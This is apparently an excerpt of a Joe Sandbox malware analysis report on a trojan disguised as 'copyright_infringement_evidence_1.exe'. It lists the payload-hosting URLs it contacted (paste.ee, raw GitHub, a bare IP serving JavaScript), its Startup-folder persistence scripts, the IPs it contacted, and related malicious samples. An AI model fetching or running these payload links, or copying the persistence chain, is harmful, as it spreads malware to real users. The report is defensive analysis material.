                                  https://www.google.comwscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://www.w3.powershell.exe, 0000001D.00000002.2295368563.00000174D4BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://paste.ee:443/d/0Hqnxkuwscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://raw.githubusercontent.copowershell.exe, 00000023.00000002.2350744372.000002080FEE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                      http://paste.ee/d/0Hqnwscript.exe, 0000002C.00000002.3473543541.000001A7C67E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://paste.ee:443/d/0Hqnxkywscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://172.214.220.82/data/Benefits.pdfcopyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          http://paste.ee/d/6fcuVnwscript.exe, 00000008.00000003.2751035108.000001C4D0290000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://paste.ee/d/0Hqnx2wscript.exe, 0000002C.00000002.3475617575.000001A7C6A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contoso.com/powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://172.214.220.82/data/Benefits.pdfycopyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://paste.ee:443/d/0Hqnxuwscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://cdnjs.cloudflare.comwscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  https://paste.ee/d/0Hqnxzawscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://cdnjs.cloudflare.com;wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001D.00000002.2295368563.00000174D4B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32723000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390C018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.microsoft.pki/powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://secure.gravatar.comwscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        https://paste.ee/d/6fcuVwscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://paste.ee//awscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                          https://go.micropowershell.exe, 00000023.00000002.2350744372.00000208108E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF528A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://paste.ee/9wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                          https://www.google.com;wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://contoso.com/Iconpowershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://paste.ee/d/0Hqnxwscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.00000254699A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.microsoft.powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                              https://paste.ee/1wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://paste.ee:443/d/6fcuVwscript.exe, 00000008.00000003.2751834805.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749778775.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757726082.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://rdoge.ru/bee/config.jsoncopyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://raw.githpowershell.exe, 00000024.00000002.2530533193.000001EF69EA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF6A015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      unknown
                                                                      http://172.214.220.82/data/2p_bee.jscopyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtKks;powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://raw.githubusercontent.compowershell.exe, 00000023.00000002.2350744372.000002081137E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.00000208112E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF532A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF53306000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://raw.githubusercontent.compowershell.exe, 00000023.00000002.2350744372.0000020811384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF5330C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://analytics.paste.ee;wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://aka.ms/pscore68powershell.exe, 0000001D.00000002.2295368563.00000174D4B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2295368563.00000174D4B63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA517EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB3274D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://themes.googleusercontent.comwscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://172.214.220.82/data/2p_bee.jsTcopyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    23.47.168.24
                                                                                    unknownUnited States
                                                                                    16625AKAMAI-ASUSfalse
                                                                                    185.199.109.133
                                                                                    unknownNetherlands
                                                                                    54113FASTLYUSfalse
                                                                                    188.114.96.3
                                                                                    unknownEuropean Union
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    172.214.220.82
                                                                                    unknownUnited States
                                                                                    18747IFX18747USfalse
                                                                                    172.67.158.129
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    IP
                                                                                    127.0.0.1
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1528568
                                                                                    Start date and time:2024-10-08 02:14:04 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 53s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:60
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:copyright_infringement_evidence_1.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.expl.evad.winEXE@99/86@0/6
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 10%
                                                                                    HCA Information:Failed
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.88.176, 23.22.254.206, 52.202.204.11, 54.227.187.23, 52.5.13.197, 172.64.41.3, 162.159.61.3, 199.232.210.172, 2.23.197.184, 2.19.126.143, 2.19.126.149, 192.168.2.5, 23.219.161.132, 20.190.159.2, 40.126.31.73, 40.126.31.71, 40.126.31.67, 20.190.159.0, 20.190.159.71, 20.190.159.68, 20.190.159.4
                                                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1784 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6000 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6688 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7320 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8000 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8044 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8344 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8472 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8948 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    TimeTypeDescription
                                                                                    02:15:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat
                                                                                    02:15:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat
                                                                                    02:15:28AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js
                                                                                    20:15:16API Interceptor3x Sleep call for process: AcroCEF.exe modified
                                                                                    20:15:24API Interceptor61x Sleep call for process: powershell.exe modified
                                                                                    20:16:05API Interceptor6x Sleep call for process: wscript.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    23.47.168.24cleu.cmDGet hashmaliciousUnknownBrowse
                                                                                      https://content.app-us1.com/5zbe53/2024/09/30/8d9df716-ca99-47ed-825e-d3a2a0e6cd9e.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                        PDF...pdfGet hashmaliciousUnknownBrowse
                                                                                          TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                            8f40pUzDo8.exeGet hashmaliciousMetasploitBrowse
                                                                                              johnny.guanCopy.pdfGet hashmaliciousUnknownBrowse
                                                                                                Bonus_Payments_Health_Insurance_Vacation_Policy_Update_20243568Acer Liquid Z63568.pdfGet hashmaliciousUnknownBrowse
                                                                                                  f_0000eb.pdfGet hashmaliciousUnknownBrowse
                                                                                                    Giger & Partner Fall Nr. 893983 Gerichtsbescheid Vergleich Nr. 241624 GM.pdfGet hashmaliciousUnknownBrowse
                                                                                                      v2.1.pdfGet hashmaliciousUnknownBrowse
                                                                                                        185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                        188.114.96.3RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                                                                                                        74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                                        • kuechenundmehr.com/x.htm
                                                                                                        PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.cc101.pro/ttiz/
                                                                                                        http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • revexhibition.pages.dev/favicon.ico
                                                                                                        http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                                                                        • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                        http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                                                                        • www.tkmall-wholesale.com/
                                                                                                        c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                                                                        • winfileshare.com/ticket_line/llb.php
                                                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                        • filetransfer.io/data-package/eZFzMENr/download
                                                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                        • filetransfer.io/data-package/eZFzMENr/download
                                                                                                        1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                                                                        No context
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        Copyright_Infringement_Evidence.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.158.129
                                                                                                        ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.159.186
                                                                                                        cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.9.92
                                                                                                        ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.9.92
                                                                                                        cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.159.186
                                                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        https://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                                                                        • 172.67.75.40
                                                                                                        FASTLYUShttps://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        Audio_Msg..00293614554893Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        RemittanceDetails(Rjackson)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.130.137
                                                                                                        L-tron_Payroll.docxGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00S